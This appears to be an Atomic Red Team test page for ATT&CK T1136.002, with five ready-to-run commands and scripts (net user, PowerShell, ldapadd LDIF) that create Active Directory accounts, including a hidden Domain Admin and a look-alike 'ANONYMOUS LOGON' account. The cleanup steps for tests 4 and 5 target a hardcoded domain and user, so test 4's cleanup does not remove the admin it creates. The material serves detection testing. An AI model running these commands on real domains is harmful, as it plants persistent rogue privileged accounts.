T1136.002 - Create Account: Domain Account

Description from ATT&CK

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Atomic Tests

• Atomic Test #1 - Create a new Windows domain admin user

• Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON

• Atomic Test #3 - Create a new Domain Account using PowerShell

• Atomic Test #4 - Active Directory Create Admin Account

• Atomic Test #5 - Active Directory Create User Account (Non-elevated)

Atomic Test #1 - Create a new Windows domain admin user

Creates a new domain admin user in a command prompt.

Supported Platforms: Windows

auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.002_Admin| | password | Password of the user to create | string | T1136_pass123!| | group | Domain administrator group to which add the user to | string | Domain Admins|

Attack Commands: Run with

1	command_prompt

!

net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain

Cleanup Commands:

net user "#{username}" >nul 2>&1 /del /domain

Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON

Create a new account similar to ANONYMOUS LOGON in a command prompt.

Supported Platforms: Windows

auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | ANONYMOUS LOGON| | password | Password of the user to create | string | T1136_pass123!|

Attack Commands: Run with

1	command_prompt

!

net user "#{username}" "#{password}" /add /domain

Cleanup Commands:

net user "#{username}" >nul 2>&1 /del /domain

Atomic Test #3 - Create a new Domain Account using PowerShell

Creates a new Domain User using the credentials of the Current User

Supported Platforms: Windows

auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Name of the Account to be created | string | T1136.002_Admin| | password | Password of the Account to be created | string | T1136_pass123!|

Attack Commands: Run with

1	powershell

!

1
2
3
4
5
6
7
8
9
10
11
12
13
$SamAccountName = '#{username}'
$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User

Cleanup Commands:

1
cmd /c "net user #{username} /del >nul 2>&1"

Atomic Test #4 - Active Directory Create Admin Account

Use Admin Credentials to Create A Domain Admin Account

Supported Platforms: Linux

auto_generated_guid: 562aa072-524e-459a-ba2b-91f1afccf5ab

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | The domain to be tested | string | example| | top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test| | admin_user | username@domain of a user with admin privileges | string | admin@example.test| | admin_password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!| | domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|

Attack Commands: Run with

1

sh

!

1
2
3
echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif

Cleanup Commands:

1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif

Dependencies: Run with

1

sh

!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available

Check Prereq Commands:

1
which ldapadd && which ldapmodify

Get Prereq Commands:

1
echo ldapadd or ldapmodify not found; exit 1

Atomic Test #5 - Active Directory Create User Account (Non-elevated)

Use Admin Credentials to Create A Normal Account (as means of entry)

Supported Platforms: Linux

auto_generated_guid: 8c992cb3-a46e-4fd5-b005-b1bab185af31

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | domain | The domain to be tested | string | example| | top_level_domain | The top level domain (.com, .test, .remote, etc… following domain, minus the .) | string | test| | admin_user | username@domain of a user with admin privileges | string | user@example.test| | admin_password | password of the user | string | s3CurePssw0rD!| | domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|

Attack Commands: Run with

1

sh

!

1
2
3
echo "dn: cn=Atomic User, cn=Users,dc=#{domain},dc=#{top_level_domain}\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif

Cleanup Commands:

1
2
3
4
5
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://#{domain_controller}:389 -x -D #{admin_user} -w #{admin_password} -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif

Dependencies: Run with

1

sh

!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify

Check Prereq Commands:

1
2
which ldapadd
which ldapmodify

Get Prereq Commands:

1
echo ldapadd or ldapmodify not found; exit 1